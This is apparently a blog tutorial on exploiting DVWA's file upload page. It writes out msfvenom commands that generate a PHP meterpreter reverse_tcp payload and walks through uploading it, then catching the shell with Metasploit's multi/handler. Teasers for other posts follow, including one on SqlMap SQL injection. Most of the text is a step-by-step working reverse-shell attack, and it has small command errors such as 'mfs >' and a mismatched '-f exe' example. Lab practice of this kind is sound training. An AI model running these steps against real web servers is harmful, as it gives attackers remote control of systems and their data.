Exploiting a Web Server - Using msfvenom generated PHP Web Payload

-

 Exploiting a Web Server - Using msfvenom generated PHP Web Payload 

This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data.

We will start by creating a pre-prepared PHP code that we will upload to the web server through the upload functionality provide by DVWA. 

For this exercise, I hosted DVWA application in XAMPP on my host operating system. I will generate PHP code using msfvenom on Kali Linux which is hosted/run on oracle VBOX.

On the Kali Linux, run the following command to generate PHP Web Payload:

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP>  LPORT=<Local Port>  -f raw > phpshell.php

For example,

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe > phpshell.exe

Here, 192.168.0.2 is a IP Address of Kali Server



It will generate following php code:



Open a Web Browser (in Kali) and go to http://localhost/DVWA-master/login.php

Log in with admin as username and password as password 




Choose the Upload menu on the lower left


Click Choose File and select the phpshell.php file we just created on the Desktop and click Upload



The file is then posted to the server and the location is displayed for you as a means of confirmation. You can copy this and paste it at the end of the URL in the browser.

In the browser, visit that file’s location:

http://192.168.0.1/DVWA-master/hackable/uploads/phpshell.php

This will actually fail and you should see a “no socket” message, but we’ll set that up next.

Back to the Kali ssh session we will set up the server to connect to from the web server.

If you’re not within msfconsole anymore, start it: 

$ msfconsole


Now we want to choose an exploit to run.

msf> use exploit/multi/handler



msf> (exploit/multi/handler): 

This selects the exploit we’ll run in Metasploit

msf > set payload php/meterpreter/reverse_tcp

To see the options for this payload, type:

msf > show options 




Set the options as follows:

mfs > set LHOST 192.168.0.2 
mfs > set LPORT 4444

These options are the ‘local’ listening IP and port for the exploit. 

Return to your web browser on the Windows PC and refresh the page.

Now we can start the server:

mfs > exploit

Exploit is the fun command… here we are running the exploit we want to see. You can also use run but exploit is so much more Hacker. After a few seconds, you should see:


And then a moment or two later we get meterpreter shell:

meterpreter >

Let’s examine the web server so see what we can find. In the Meterpreter shell type:

meterpreter > dir



You can perform or run any command of targeted OS on meterpreter shell.

To see a list of the commands that are available to you, you can type help command at any time, when you’re finished type exit and the Meterpreter shell will close. 

Comments

Post a Comment

Popular posts from this blog

Automate SQL Injection Exploitation with SqlMap - DVWA

-
Automate SQL Injection Exploitation with SqlMap - Damn Vulnerable Web App ( DVWA) What is a SQL Injection? SQL injection is a technique often used to attack data driven applications. SQL injection is considered a high risk vulnerability due to the fact that can lead to full compromise of the web application. This is why in almost all web application penetration testing engagements, the applications are always checked for SQL injection flaws. A general and simple definition of when an application is vulnerable to SQL injection is when the application allows you to interact with the database and to execute queries on the database then it is vulnerable to SQL injection attacks. This is done by crafted parameter/statements passed as input (HTML form) in an attempt to get the website to pass a newly formed SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a vulnerability in an web application's code....
Read more

How To Imitate (Replicate) pbcopy And pbpaste Commands On Linux

-
Image
How To I mitate (Replicate ) pbcopy And pbpaste Commands On Linux pbcopy  on a mac enables you to copy the standard input from terminal window to your clipboard enabling you to paste it to other applications.  This functionality is not   available  by default on  Ubuntu / Linux  but can be easily imitate using  available Linux commands You can  imitate  pbcopy and  pbpaste     on ubuntu/linux by using similar tool called  xclip which does exactly the same.  However its syntax is a little complicated  it required more options/switches. So,  I am going to  imitate  it with  pbcopy and pbpaste command. Fortunately, OS X and Linux *nix based we can make use of the The alias c ommand to replicate the pbcopy and pbpaste functionality in ubuntu/linux. If you haven’t previously installed xclip simply run the following command in your terminal:    $  sudo apt-get install xclip -y Edit y...
Read more